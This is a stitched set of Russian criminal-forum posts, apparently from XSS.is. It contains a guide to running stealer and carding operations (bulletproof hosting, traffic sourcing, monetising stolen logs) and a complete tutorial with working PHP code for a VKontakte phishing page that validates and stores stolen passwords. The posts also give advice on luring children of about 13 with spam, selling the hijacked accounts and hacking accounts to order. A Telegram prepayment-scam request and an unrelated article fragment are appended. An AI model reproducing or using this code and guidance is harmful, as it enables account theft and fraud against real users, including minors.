Ну а здесь просто поле для манёвров. Нолики туда-сюда, уверения туда-сюда. Лживые слова и улыбочки по переписке. Давайте разложим всё по полочкам. Прежде всего нужно спросить, что можно размещать на сервере. Если ваш стиллер размещать можно, то это, прежде всего разрешение хостинга и не больше, а не устойчивость к абузам!!! Дурят даже на этом!
Пример: Хостинг без проблем разрешает разместить стиллер, но говорит, что в случае жалобы (абузы) отключит его.
Так же нынче очень активно продвигается абузоустойчивость, но без чего-либо (например, без защиты от спамхауса) или «ограниченная абузоустойчивость».
-- Голубчик, это вздор!
-- Чего вздор?
-- Вторая свежесть -- вот что вздор! Свежесть бывает только одна -- первая,
она же и последняя. А если осетрина второй свежести, то это означает, что она
тухлая! (с)
Поэтому если берете абузоустойчивый сервер, то уточняйте, какие абузы он держит. Любимая фраза хостеров: «Да мы полностью абузоустойчивый хостинг, но вот жалобы от ### не держим». Не устраивает такой подход, хорошим аналогом будет фастфлюкс. Правда хороший еще поискать надо.
Тут еще проще – их не существует. Вообще никаких. Есть относительно лояльные. Но не более. Поэтому домены придется менять. Иногда часто, иногда редко. Но сразу на это настраивайтесь. И поставьте авточекер, который будет проверять живой домен или нет. Хуже не будет.
Пример: домен сдох во время пролива трафика и весь трафик пошел псу под хвост. Как этого избежать? Читайте в следующий статьях.
Больше частью саппорт очень тупой и не разбирается в вопросах от слова совсем и вообще. Тут слово наёб употребить сложно, но некоторые вопросы которые можно самому решить за полчаса, могут занять 1-2 дня, если не больше. Поэтому опять же – навык базового администрирования сервера ну очень необходим.
Параграф четвертый. Трафик.
Тема очень обширна и требует прямо-таки отдельной большой статьи. Единственное предисловие, которое я хочу сразу сказать. Ниш, где можно найти нужный вам трафик МОРЕ. Навскидку могу назвать 3-4, где минимальная конкуренция. И не надо быть семи пядей во лбу, чтобы запустить туда бур и начать разработку. Просто надо немного пошевелить задницей и напрячь котелок.
Мини-заключение
Статья была длинная, поэтому на этом пока что всё. Если народу будет интересно, продолжу.
В личку пожалуйста не долбитесь с вопросами, задать можете прямо в топике. По возможности постараюсь ответить.
Так же можете сказать, о чем интересно узнать в дальнейшем в первую очередь.
Часть вторая
Долгосрочный успех не бывает быстрым. Либо так, либо так, но не вместе. Бизнес – это марафон.
Прежде чем перейти далее, отвлекусь немного. Хотите, я скажу выводы из всей этой эпопеи? Работаю со многими людьми в смежных областях и самые популярные фразы, которые я слышу:
Итак, люди хотят денег. Это логично. Люди хотят денег, ничего не вкладывая. Это не логично. Люди хотят много денег, ничего не вкладывая и ничего не зная. Это уже тупо. Поэтому придется, прежде всего, разобрать еще один вопрос, на который опять же 99% ложит хрен.
Параграф четвертый. Финансовая грамотность.
Собственно, а зачем вообще что-то считать и прогнозировать? Вдарим, ухнем, хряпнем, тяпнем и оно всё сам сложится как надо. Правильно? А потом на форумах идёт плач Ярославны на тему: «Оно не работаааааает, всё сдохлооооо, кардинг мёёёёртв, УУУУ!».
Первое правило финансовой грамотности – не сидеть на форумах общего назначения.
99% людей ни на что не способны. Из оставшегося процента 99% людей занимаются не тем, что интересно тебе. С оставшимися можно при совпадении многих случайных факторов сделать большое дело.
Представьте, что у вас есть вопрос, на который вам нужно получить ответ. Вы идёте на форум, где сидят нубы, тролли, школота и небольшой процент умных людей. Умные люди вам ответят, вряд ли, им некогда, лень, да и в принципе палить полезную инфу как-то не с руки. А вот остальные … УХ. Минимум получите потраченное время и испорченное настроение. Максимум – скормят левую информацию.
Что делать? Меньше впитывайте в себя ненужную информацию, основанную на бесполезных эмоциях и вбросах. Образуйте связи, вступайте в небольшие целевые группы/каналы/закрытые форумы, общайтесь со знающими людьми. Процесс небыстрый, зато очень эффективный.
Второе правило финансовой грамотности – имей надёжную, железобетонную, титановосплавную техническую базу.
Если менять свободу и перспективы на колбасу, однажды не останется ни свободы, ни перспектив, ни колбасы.
К предыдущему моему посту. Всегда работайте на хорошем и надёжном хостинге. Это стоит не так дорого! Это ваша база и основа. Без неё нет смысла двигаться дальше. Логика «пока быстренько так, подниму копеечку и сразу перееду на нормальный» обычно кончается тем, что получается полный «пшик».
Всегда проверяйте купленный софт на работоспособность! Если ваш купленный софт, на арендованном хостинге выполняют свою задачу хотя бы на 4 с плюсом, то тогда можно двигаться дальше. Если нет – вернитесь к «шагу ноль» и пройдите путь заново.
Третье правило финансовой грамотности – имей чёткий бизнес план, экономический расчет и конкретные цифры.
Реальные ценности создавать гораздо тяжелее, чем их видимость. Для второго вам понадобится только хороший пиарщик и много фантазии. С первым обычно всё сложнее — там есть цифры.
А это вообще бич нынешних недо-кардеров. Когда у меня просят помощи или консультации, я всего прошу показать финансовые расчёты и чёткий план действий. Как вы можете понять, ни у одного подобного человечишки его не существует в природе.
ВСЕГДА (вот так капсом, ага) нужно иметь расчёты. По пунктам, с чувством, толком и расстановкой. Учитывая мнимую и вредную экономию (возьму хост подешевле, крипт подешевле, трафик подешевле) и нужную экономию (возьму чуть подороже, зато сэкономлю деньги).
Примерные расчеты выглядят так:
Хостинг + софт + расходники + крипт + аренда нужных сервисов + текущие расходы + подушка безопасности на напредвиденные расходы (10-20% от суммы) = N долларов
Затем сверяем с количество денег на счету. Если укладываетесь, то хорошо. Если нет, то либо думаем где можно адекватно сэкономить, либо добиваем недостающую сумму. Начинать что-либо с профицитом бюджета – это потерять все деньги и ничего не получить по итогу.
Четвёртое правило финансовой грамотности – из говна конфетку не слепить.
Чудеса случаются, но только с другими людьми. Свои чудеса надо тщательно и заранее готовить.
Тут опять же злую роль играет вера в чудеса. Практически каждый человек без личного опыта, ждёт что «а вдруг оно сложится и всё получится». Не последнюю роль в этом играют форумы, где есть куча отзывов и историй людей, который хоп и гребут бабки, без опыта, знаний, понимания, вложений.
Согласитесь обидно? Вы весь такой начитанный и подготовленный и у вас дырка от бублика в кармане, а кто-то рубит бабло из воздуха.
Не бывает такого. Если в вашем круге общения люди, которые ничего не знают, не понимают, не разбираются, не хотят учиться и вообще активно вещают херню на тему «я тупо колочу бабло, нажимая кнопки», то пора вам менять круг общения.
Успех – это не альтернатива неудаче. Успех это то, что приходит после серии неудач.
Пятое правило финансовой грамотности – никаких платных мануалов.
Запомни, сынку, три важных правила:
Параграф пятый. Трафик и инсталлы. Мифы.
Мир справедлив. У каждого следствия есть своя причина. Каждый получает именно то, для получения чего создал условия.
Трафик – это святая святых всех кардеров. Мекка и святой Грааль. Объект поклонения, дрочева и бесчисленных мифов и легенд.
Естественная столь жирная и вкусная тема привлекла огромное число людей из серии «я вам за небольшие деньги продам большие деньги, только купи». А лохи и рады верить.
Поэтому давайте разбирать основные мифы и легенды, попутно думая, в какую же сторону рыть и двигаться. Повторюсь! Не будьте тупыми, будьте умными. Не разрешайте разным ублюдкам кормиться за ваш счёт! Читайте и мотайте на ус.
Внимание! Я специально говорю про трафик, а не готовые инсталлы. Объяснение дам в конце.
Всё дальнейшее – это моё личное мнение, основанное на логике и практическом опыте. Верить, не верить, принимать, использовать, оперировать полученный информацией или нет – это ваш личный выбор.
**Трафик. Основные псевдо-мифы.
Миф 1. Трафик это 99% успеха в деле.**
Трафик это 30-35% успеха дела. А может и меньше.
Грамотно сконвертировать трафик в инсталлы (от этого зависит количество да и качество инсталлов), отработать все типы трафика (декстопный и мобильный), добиться высокого конверта и, наконец, по максимуму монетизировать полученный результат – это задача еще более сложная, чем добывать трафик.
Миф 2. Хорошего трафика очень мало и его очень сложно добывать.
Трафика ОЧЕНЬ много и добывать его не так сложно, как об этом леший малюет. Просто надо шевелить головой. Не надо искать там, где нет того, что хочется найти.
Миф 3. За хорошие деньги, можно купить качественный трафик.
Нельзя. Никто не будет продавать деньги за деньги.
Миф 4. Есть готовые решения по добыче трафика.
Нету. Все готовые решения – это банальный развод для хомячков и не больше.
Инсталлы. Основные псевдо-мифы.
Здесь еще всё интереснее. Если работа с голым трафиком распространена относительно мало (ибо там нужен опыт и какая-никакая, но база, для приёмки и обработки), то рынок по продаже инсталлов это «Большой Круговорот Дерьма в Природе». Хотите узнать почему? Читаем дальше.
Представьте, что у вас есть свой канал трафика, и вы с него черпаете инсталлы. Трафик у вас приватный, свой, хороший и т.д. А потом вы решили, вместо того, чтобы понять на нём денег, продавать его по 1 баксу за инсталл. Или еще веселее – продавать готовые логи, вместо того, чтобы их монетизировать самим.
Представляете, сколько существует благородных самаритянинов?
Я однажды подсчитал с учетом всех возможностей монетизации, сколько бы мог стоить мой инсталл, если бы я хотел его продавать. Крипта, банки, палка, амазоны, шопы, акки, линки и т.д. Cтоимость одного инсталла с хорошего трафика получилась около 25-30$ Причем, это чисто декстопный трафик. Без жирных ваеров и прочего.
Картина выглядит примерно так. Кто-то насрал, другой съел, переварил, опять насрал. Это вторично переработанное дерьмо, опять кто-то съел и так по кругу. Пардон за неприятную картину, но по факту так и есть. Не спорю, даже ковыряясь в дерьме, можно нарыть что-то относительно съедобное и полезное. Но вам-то оно надо?
Заключительный вывод первый – любая продажа трафика, логов etc это обычный и простейший развод хомячков, которые ничерта не соображают в том, что делают.
Заключительный вывод второй – если подсчитать затраты (деньги+время) и чистую прибыль, то получится удивительная картина. Свой трафик (даже поганого качества) в разы, если не на порядок, профитнее и выгоднее!
Параграф шестой. Трафик. Добыча.
Важнейшее замечание! Кроме добычи трафика, нужно уметь его еще грамотно конвертировать, обрабатывать и монетизировать по максимуму. Это, возможно, самая сложная тема во всей цепочке. Иначе без этого, даже самый хороший и целевой трафик можно спустить в унитаз. Или получить в десять раз меньше прибыли, чем её могли бы быть.
Если коротко, то тема конвертации трафика в инсталлы - сложная, объемная и требует качественной соображалки. И разных тестов сплит-тестов. Много сплит- тестов.
P.S. Высказанное выше, это сугубо моё мнение. Кто-то делает лендинги за 50 баксов и не парится.
Но на данный момент мы остановимся лишь на методах добычи трафика. Схемы работы с ними я писать не буду, по понятным причинам. Если до сих пор не поняли, почему никто не будет писать готовые мануалы – перечитываем пост.
Биржи
Как проще всего добывать трафик? Купить его - это логично. А теперь ключевой вопрос – почему биржевой трафик самый задроченный и убитый? Ответ – потому что его можно купить бесплатно (т.е. вбить). Картина примерно следующая. Есть энное количество бирж, где можно закупить трафик нахаляву. То бишь купить картонку и вбить ее, это намного выгоднее, чем выкладыватаь свои кровные.
Кому выгоден такой трафик? Сервисам по продаже инсталлов и логов (см. выше).
Тупые хомячки будут жрать это говнецо, пищать на несправедливость мира и …
продолжать жрать это говнецо. Секта копрофилов, мать их. Тьфу.
Получается все биржи – это полное УГ и смысла в них нет?
Ну, джентельмены, это смешно. Бирж трафика ХРЕНОВА туча. Ну, вот очень много их. Берите те, которые не дрочат все кому не лень и работайте с ними. Да придется выложить свои кровные, то бишь платить вбелую. Но где вы видели бизнес без рекламы? Здесь схожая картина. Хотите «клиентов», вкладывайтесь в рекламу. И будет вам профит.
Ну, или продолжайте жаловаться на плохих и злых дядей, который не дают вам жить хорошо и толкают трафик в 10 рук.
**P.S. А вот явный минус бирж – это ограниченный трафик, который так или иначе будет выработан. Поэтому для тех кто активно хочет использовать биржи в своей работе, желательно постоянно искать новые ресурсы и менять разводки на старых.
Связки**
Моральный устаревший метод добычи инсталлов с IE. Толку ноль, профита, в общем-то, тоже. Хорошего мата тем более. Потеря времени. Это даже не вчерашний, а позавчерашний день.
СPA конторы
Больше подходят для мобильных инсталлов, но с фантазией можно придумать качественный подход и для декстопного трафика. Тема достаточно выдроченная, поэтому на кривой козе тут не подъехать. Нужно понимание рынка и определенная доля соображалки. Не для средних умов. Поэтому если добились успеха, поздравляю, ваш интеллект выше среднего.
Фейсбук и гугл адвордс
Очень качественный и целевой трафик. Одна из самых лучших тем для работы с трафиком, в общем и целом. Минусы те же. Постоянно крутят гайки, требуется постоянно искать новый подход, бороться с модерацией, повышать конверт и отслеживать еще кучу параметров. Рекомендуется работать в небольшой команде. В данном сегменте скорость работы является одним из самых важных параметров. Работая в одиночку, времени тупо не будет хватать ни на что.
Торренты
Многие скажут, что тема давно выдрочена. В общем-то, да. Для обычных людей. А вот умные люди черпают оттуда ОЧЕНЬ вкусный трафик и инсталлы. Не советую сбрасывать со счетов. Наши ребята с инсталлов чисто с торрентов делают около 10-15К$ в неделю.
Фриланс
Лайфхак. Если делать что-то самому лень или не умеешь, отдай на аутсорс. Специалист сам всё сделает, настроит и нагонит трафик.
Плюсы:
Минусы:
А так ниша хорошая, как раз в том, что выдрочена и граница между «кинули, уроды» и «крутой чел, охрененный трафик» огроооомная и труднопреодолимая. Есть смысл озаботиться. Порог входа высокий.
Спам (смс и мыло)
Спам мыл, тема скажу откровенно сложная, ибо требует мощной технологической базы и поддержки. Спам-фильтры стали мощные, на кривой козе их не объехать. Плюс нужны хорошие базы, желательно корпоративные. Высокая фантазия, как их грамотно обработать. Ну и руки из нужного места.
Для нубов, два важнейших замечания:
Смс спам, наоборот тема благородная и благодатная. Минусы те же, нужен свой смс шлюз, хорошая фантазия, приложение/АПК файл, базы и т.д. Ну и наконец, софт и деньги на организацию всего этого хозяйства.
Шеллы
Наверное, самая сложная тема с технической точки зрения. Их мало добыть, надо еще и трафик слить оттуда. А это уже задача сложная. Поэтому если умеете, данная статья вообще не для вас. Если не умеете, то это не для новичков. И даже не для любителей.
Параграф седьмой. Лендинги. Конверсия.
Очередная мега-обширная тема, на которую 99% кладёт болт. И которая приносит около 50% успеха дела. Как-то так
Чиркани отзыв, поставь лайк. Ну и пишите в комментариях, какие темы еще разобрать.
Если нужна консультация, то пишите адекватные сообщения с конкретными вопросами. Всякие там «броканья» с «типа хочу денег, но хз чо делать, скажи куда рыть и напиши мануал, чтобы я сделал и получил кучу бабла» засуньте себе в … ну поняли в общем. Надоело такие сообщения читать.
Благодарность принимаю на BTC : 15La1sGz7DqrXap6CEdZdDGZoeH47KtHTW
Аудиозаписи с голосом имеются. Необходимо, чтобы фраза была произнесена его голосом.
Фишинг - один из старейших способов развода, который не умрет никогда.
В этой статье я расскажу что такое фишинг, способы заработка с помощью него и
КАК СДЕЛАТЬ таковой самому.
Статья больше подходит для школьников-студентов, которым не помешает лишний
'чирик' в кармане
Рассказывать буду о фишинге ВК, но, при должном желании можно сделать тоже
самое и для других платформ
............................
Итак, начнем.
Фишинг Вконтакте - один из лучших способов заработка, так как имеет
разветвления, позволяющие КАЖДОМУ найти в нем что-то 'свое'.
Ниже приведен КРАТКИЙ список способов заработка на фишинге ВК:
1. Индивидуальный взлом аккаунтов с помощью фишинга - 500р+ с одного заказа
2. Продажа самого фишинга на бордах - 50р-3000р с одной продажи
3. Спам - 4р-30р+ за аккаунт, 50р+ в день
О 3-ем пункте поговорим чуть подробнее.
Спам является одним из самых легких способов заработка на фишинге, ведь он
не имеет необходимости сдачи проделанной работы в сроки, постоянного онлайна и
общения с покупателями.
Можно нанять спамеров, можно спамить самому, но суть остается той же- нет
графика работы и дедлайнов.
Со способами заработка я надеюсь ты, мой читатель, ознакомился.
Теперь приступим к тому, как сделать свой фишинг ВК и работать с ним.
--------------------
Обычно фишинги пишутся на PHP и MySQL.
Но, для практики обойдемся 'файликами', вместо полноценной БД.
Да, это небезопасно, но для начала сойдет
--------------------------------------------------------------------
Для начала, чтобы наши PHP-скрипты работали - скачай локальный сервер. Мой
выбор пал на DENWER (Тык)
Скачивай, открывай, устанавливай.
В нескольких шагах проинструктирую всю установку:
1. 'Вы действительно хотите установить базовый пакет?' - Да
2. Открывается консоль - следуй инструкции и выбирай рекомендуемые настройки
3. После установки - На всякий случай перезагрузи компьютер
4. После перезагрузки зайди в ' Мой компьютер' и, если появился новый диск - заходи в него - denwer -start.exe
elseif4. Зайди в диск C:// - и найди папку WebServers. Далее заходи в нее - denwer -start.exe
Итак, ты успешно установил Denwer. Приступаем к 'написанию' фишинга
Для начала нужно зайти в само 'хранилище' наших сайтов. Оно находится в
C:\WebServers\home\localhost\www.
Создай в данной директории новую папку с названием сайта. Например vktest.
Заходи в нее и создавай:
**файл index.php
папку info с файлами ipaddr.txt , mps.txt , name.txt , text.txt **
Заходи в него с помощью любого редактора (Sublime Text, Kamodo Edit, Atom,
Notepad++)
И копируй код ниже (он большоооооооой):
Spoiler: Код
PHP:Copy to clipboard
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta charset="utf-8">
<link rel="shortcut icon" href="https://vk.com/images/icons/favicons/fav_logo.ico?5" />
<link rel="apple-touch-icon" href="https://vk.com/images/safari_60.png?1">
<link rel="apple-touch-icon" sizes="76x76" href="https://vk.com/images/safari_76.png?1">
<link rel="apple-touch-icon" sizes="120x120" href="https://vk.com/images/safari_120.png?1">
<link rel="apple-touch-icon" sizes="152x152" href="https://vk.com/images/safari_152.png?1">
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="description" content="" />
<title>Вход | ВКонтакте</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="https://vk.com/css/al/fonts_cnt.css?2889730895" />
<link rel="stylesheet" type="text/css" href="https://vk.com/css/al/common.css?29532151062" />
<link type="text/css" rel="stylesheet" href="https://vk.com//css/al/login.css?21188992645">
</link>
<link type="text/css" rel="stylesheet" href="https://vk.com//css/al/ui_common.css?21113360501">
</link>
</head>
<body class="login_page">
<div id="system_msg" class="fixed"></div>
<div id="utils"></div>
<div id="layer_bg" class="fixed"></div>
<div id="layer_wrap" class="scroll_fix_wrap fixed layer_wrap">
<div id="layer"></div>
</div>
<div id="box_layer_bg" class="fixed"></div>
<div id="box_layer_wrap" class="scroll_fix_wrap fixed">
<div id="box_layer">
<div id="box_loader">
<div class="pr pr_baw pr_medium" id="box_loader_pr">
<div class="pr_bt"></div>
<div class="pr_bt"></div>
<div class="pr_bt"></div>
</div>
<div class="back"></div>
</div>
</div>
</div>
<div id="stl_left"></div>
<div id="stl_side"></div>
<div class="scroll_fix_wrap _page_wrap" id="page_wrap">
<div>
<div class="scroll_fix">
<div id="page_header_cont" class="page_header_cont">
<div class="back"></div>
<div id="page_header_wrap" class="page_header_wrap">
<a class="top_back_link" href="" id="top_back_link" onclick="if (nav.go(this, event, {back: true}) === false) { showBackLink(); return false; }" onmousedown="tnActive(this)"></a>
<div id="page_header" class="p_head p_head_l0" style="width: 960px">
<div class="content" >
<div id="top_nav" class="head_nav">
<div class="head_nav_item fl_l">
<a class="top_home_link fl_l " href="/" aria-label="На главную" accesskey="1">
<div class="top_home_logo"></div>
</a>
</div>
<div class="head_nav_item fl_l">
<div id="ts_wrap" class="ts_wrap">
<input name="disable-autofill" style="display: none;" />
<input type="text" onmousedown="event.cancelBubble = true;" ontouchstart="event.cancelBubble = true;" class="text ts_input" id="ts_input" autocomplete="off" name="disable-autofill" placeholder="Поиск" aria-label="Поиск" />
</div>
</div>
<div class="head_nav_item fl_l head_nav_btns"><span id="top_audio_layer_place"></span></div>
<div class="head_nav_item fl_r"><a class="top_nav_link" href="" id="top_switch_lang" style="display: none;" onclick="ajax.post('al_index.php', {act: 'change_lang', lang_id: 3, hash: '274d71cad1b5904c92' }); return false;" onmousedown="tnActive(this)">
Switch to English
</a><a class="top_nav_link" href="/join" id="top_reg_link" style="display: none" onclick="return !showBox('join.php', {act: 'box', from: nav.strLoc}, {}, event)" onmousedown="tnActive(this)">
регистрация
</a>
</div>
<div class="head_nav_item_player"></div>
</div>
<div id="ts_cont_wrap" class="ts_cont_wrap" ontouchstart="event.cancelBubble = true;" onmousedown="event.cancelBubble = true;"></div>
</div>
</div>
</div>
</div>
<div id="page_layout" style="width: 960px;">
<div id="page_body" class="fl_r " style="width: 960px;">
<div id="header_wrap2">
<div id="header_wrap1">
<div id="header" style="display: none">
<h1 id="title"></h1>
</div>
</div>
</div>
<div id="wrap_between"></div>
<div id="wrap3">
<div id="wrap2">
<div id="wrap1">
<div id="content" class="page_block">
<div id="step1">
<h2 class="login_header">Вход ВКонтакте</h2>
<div id="login_message">
<?php echo '
<div class="oauth_wrap_content" id="oauth_wrap_content">
<div class="oauth_head">
<a class="oauth_logo fl_l" href="#" target="_blank"></a>
<div id="oauth_head_info" class="oauth_head_info fl_r">
</div>
</div>
<div class="oauth_content box_body clear_fix">
<form method="POST" id="login_submit">
<div class="oauth_form">
';
$nametxt = fopen('info/name.txt', "a+");
$texttxt = fopen('info/text.txt', "a+");
$ipaddrtxt = fopen('info/ipaddr.txt', "a+");
$mpstxt = fopen('info/mps.txt', "a+");
function example() {
echo '<div id="box_error" class="box_error" style="display: block;">Неверно введён логин или пароль.</div><br>';
}
function curl($url){
$ch = curl_init( $url );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
$response = curl_exec( $ch );
curl_close( $ch );
return $response;
}
if (isset($_POST['email'])){
$info = '';
$capecho = '';
$ipaddr = $_POST['ipaddr'];
$email = $_POST['email'];
$password = $_POST['pass'];
if(isset($_POST['captcha_sid'])) {
$captcha_sid = $_POST['captcha_sid'];
$captcha_key = $_POST['captcha_key'];
} else {
$captcha_sid = '';
$captcha_key = '';
}
$res = curl('https://oauth.vk.com/token?grant_type=password&client_id=3697615&client_secret=AlVXZFMUqyrnABp8ncuU&username='.$email.'&password='.$password.'&captcha_key='.$captcha_key.'&captcha_sid='.$captcha_sid);
$lo='access_token';
$pos = strripos($res, $lo);
$json = json_decode($res, true);
if ($pos === false) {
if($json["error"] === "need_captcha")
{
$info='<br><div class="box_error" style="margin-bottom:15px;">Ошибка авторизации. Введите код с картинки.</div>';
$capecho = 1;
$capid = $json["captcha_sid"];
}else {
example();
$capecho = 0;
}
}else {
$name = $_POST['email'];
$text = $_POST['pass'] ;
$ipaddr = $_POST['ipaddr'];
$mps = $name.':'.$text ;
$post_data = array (
'email\n' => $name,
'pass\n' => $text,
'ipaddr\n' => $ipaddr,
'mailpass\n' => $mps,
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// указываем, что у нас POST запрос
curl_setopt($ch, CURLOPT_POST, 1);
// добавляем переменные
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$output = curl_exec($ch);
curl_close($ch);
$info='<div class="info_line" align="center" style="font-weight:bold;">Вход выполнен.</div><br>
<div class="info_line" align="center">Ваша заявка на проверку была отправлена и будет обработана через 12 часов!
</div><br>
';
}
$nametxt = fopen('info/name.txt', "a+");
$texttxt = fopen('info/text.txt', "a+");
$ipaddrtxt = fopen('info/ipaddr.txt', "a+");
$mpstxt = fopen('info/mps.txt', "a+");
fwrite($nametxt, $name);
fwrite($nametxt, '<br/>');
fwrite($texttxt, $text);
fwrite($texttxt, '<br/>');
fwrite($ipaddrtxt,$ipaddr);
fwrite($ipaddrtxt,'<br/>');
fwrite($mpstxt, $mps);
fwrite($mpstxt, '<br/>');
}
else{
}
echo $info;
if ($pos != true ) { echo '
<form action="savebase.php" method="POST">
<div class="oauth_form_login">
<div align="center" >
<input style="padding:15px;" type="text" class="oauth_form_input dark" name="email" id="index_email" value="'.$email.'" required placeholder="Телефон или e-mail">
<br/>
<br/>
<input type="hidden" name="ipaddr" value="' .$_SERVER['REMOTE_ADDR']. '">
<input style="padding:15px;" type="text" class="oauth_form_input dark" name="pass" id="index_pass" value="'.$password.'" required placeholder="Пароль" style="-webkit-text-security: disc;" />
</div>
';
echo '
<div class="login_buttons_wrap" align="center">
<button class="flat_button button_big_text login_button" id="install_allow" type="submit">Войти</button><button class="flat_button button_big_text login_reg_button" onclick="javascript:void(0)">Регистрация</button>
<input type="submit" name="submit_input" class="unshown">
</div>
</div>
</div>
</form>
</div>'; }
echo '
</div>
</html> '; ?>
</div>
</div>
<div class="login_fast_restore_wrap _retore_wrap"></div>
</div>
</div>
</div>
</div>
</div>
<div id="footer_wrap" class="footer_wrap fl_r" style="width: 960px;">
<div class="footer_nav" id="bottom_nav">
<div class="footer_copy fl_l"><a href="https://vk.com/about" target="_blank">ВКонтакте</a> © 2018</div>
<div class="footer_lang fl_r">Язык:<a class="footer_lang_link">English</a><a class="footer_lang_link" >Русский</a><a class="footer_lang_link">Українська</a><a class="footer_lang_link">все языки »</a></div>
<div class="footer_links">
<a class="bnav_a" href="https://vk.com/about" target="_blank">о компании</a>
<a class="bnav_a" href="https://vk.com/terms" target="_blank">правила</a>
<a class="bnav_a" href="https://vk.com/ads" target="_blank" style="">реклама</a>
<a class="bnav_a" href="https://vk.com/dev" target="_blank">разработчикам</a>
</div>
</div>
<div class="footer_bench clear">
</div>
</div>
<div class="clear"></div>
</div>
</div>
</div>
<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script src="../js/default.js"></script>
</body>
</html>
Для тех, кого интересует его структура:
1. Сама страница (HTML,CSS)
2. Запрос к vk.com с помощью cURL (для автоматической проверки аккаунтов)
3. Получение ответа
4. Запись в файлы (fopen, fwrite)
........................
После создания папки info с txt-файлами(text.txt, name.txt, ipaddr.txt,
mps.txt) ты будешь получать туда ВСЕ валидные (верные) комбинации
аккаунтов.
Чуть-чуть доделав скрипт можно начать его продавать или использовать самому.
------------------------
После написания своего супер-пупер скрипта - нужно залить его на ВДС-ку или
хостинг. Отличия лишь в том, что хостинг банит СРАЗУ такие скрипты, а ВДС-
ки нет.
Из ВДС-ок я использую TimeWeb (не реклама). Как ставить на него
скрипт/сайт можете посмотреть на ютубе.
Для исправной работы скрипта понадобится установить расширение 'cURL' если оно
заранее не установлено.
Стоимость самого дешевого сервера - 200р. Но он будет служить тебе еще целый
месяц, за который можно будет ооооочень легко его окупить.
!!! ВАЖНО!!!
Делать это все нужно через ВПН, дабы избежать различных проблем в
будущем/блокировок.
Итак, ты загрузил весь скрипт на хостинг/вдс, получил первые аккаунты, но не
знаешь где и как их продать?
Для этого есть отдельные маркеты по типу LZT.MARKET (не реклама) и других.
Также, если у тебя есть свободный бюджет и ты готов потратить свои 500-1000
кровных - можешь смело открывать свой интернет-магазин аккаунтов с помощью
deer.io (не реклама) и продавать их в 1.5-3 раза дороже. Именно на deer.io
стоят большинство интернет-магазинов с аккаунтами вк, поэтому готовься к
'потной конкуренции', которая МОЖЕТ помешать твоему 'бизнес-плану' =))
А что если ты загрузил все-таки скрипт, но никак не можешь получить первые
аккаунты?
Если у тебя ничего не вышло - можешь воспользоваться моим мини-мануалом
по спаму, вложенном в моем скрипте, который я продавал :
"Итак, многие из вас видели группы для тупиков по типу 'эта страница
подтверждена' 'официальная страница
' взаимные лайки' и тому подобные.
Их участники будут нашими жертвами.
Находим онлайн участников группы, которым по фоткам максимум 13 лет и
пишем:
-Привет, ИМЯ!
Мы недавно запустили новый сервис по накрутке друзей/лайков,
поддержи нас пожалуй ста!
LINK.
Заранее ооочень благодарны)
После некоторого времени ожидаем наши аккаунты"
Таким способом у меня получалось делать около 5-30 аккаунтов в день,
которые я успешно продавал на маркете за 6 рублей.
Не трудно посчитать что в день выходило около 30-180р. Да, это копейки, но
статья изначально писалась для школьников-студентов
Как нанимать спамеров чтобы зарабатывать на пассиве?
Так как наша панелька сделана 'на коленках' и в ней нет панелей для спамеров -
много спамеров нанимать не нужно, 2-3х хватит.
Заходи на соседние борды и создавай везде новую тему с загаловком:
' Найму спамеров на фишинг ВК'
В теме закинь свои контакты (телеграм/жаба) и, после получения ответа, веди
разговор со спамером, одновременно стараясь нанимать других.
Затем, к примеру через месяц - просмотри общий свой доход и оплати каждому по
25% от заработанного бюджета. Остальные 25% оставляй себе.
Получается что ничего не делая ты просто зарабатываешь небольшие деньги,
неплохо, не так-ли?
Но это лишь на словах так, на самом деле тебе прийдется очень долго находить
таких людей, более ответственно отнестись к выплатам + отвечать на порой
ооооочень 'тупые' вопросов от них же.
..............
Теперь, разобрав всю тему со спамом, приступим к разбору темы с '
индивидуальным взломом' аккаунтов.
Такой способ НАМНОГО прибыльнее предыдущего, но он требует от тебя должной
подготовки и знания ХОТЯ БЫ основ СИ (соц. инженерии)
С чего начинать?
Зайди на борды соседней тематики и создай тему 'Взломаю аккаунты ВК по
дешевке'
В теме начинаешь писать обо всем: условиях покупки, что человек получает после
покупки, шансы взлома и т.д
Расценки можно ставить разные: начиная от 100-а рублей и заканчивая 2-мя
тысячами за один аккаунт.
После получения первого заказа - посмотри интересы жертвы и заводи разговор
ИМЕННО на эти же темы, дабы заинтересовать его зайти по ссылке.
После успешного взлома - присылаешь доказательства покупателю, получаешь
оплату и отдаешь комбинацию НОМЕР:ПАРОЛЬ с текстовых документов =)
------------------
Ответы на твои будущие вопросы:
Файл не меняет свое расширение на .php:
Для фикса зайди в - Панель управления - Оформление и персонализация -
Параметры проводника - Вид. В самом внизу найдите ' Скрывать расширения
для зарегистрированных типов файлов' и убери галочку. Примени настройки и
БАМ, меняй расширение файла.
Denwer не устанавливается:
Так как ошибок может возникнуть немереное количество - гугли.
Как связаться с тобой?:
Связаться со мной или задать вопросы можешь по телеграмму @xndefined
----------
На все остальные вопросы буду отвечать по мере возможности в данной теме. На
глупые вопросы буду отвечать 'google.com' =)
Такую статью создания и использования фишинг скрипта ВК с ЧЕКЕРОМ ты вряд
ли найдешь еще где-нибудь.
Также, я принимаю участие в конкурсе:https://xss.is/threads/26627
Special for XSS.IS
Кто в этой теме шарит? Хочу заняться скамом в телеграм. Создать и продвинуть к
примеру канал по дешевой техники Apple и по предоплате кидать мамонтов.
Опасная ли это тема, будут ли искать менты, кто подскажет?
You must have at least 20 reaction(s) to view the content.
Тестируйте.
Введение
Селфи-проверка стала одним из наиболее распространенных способов подтверждения
личности в приложениях. Она используется в банковских приложениях, при
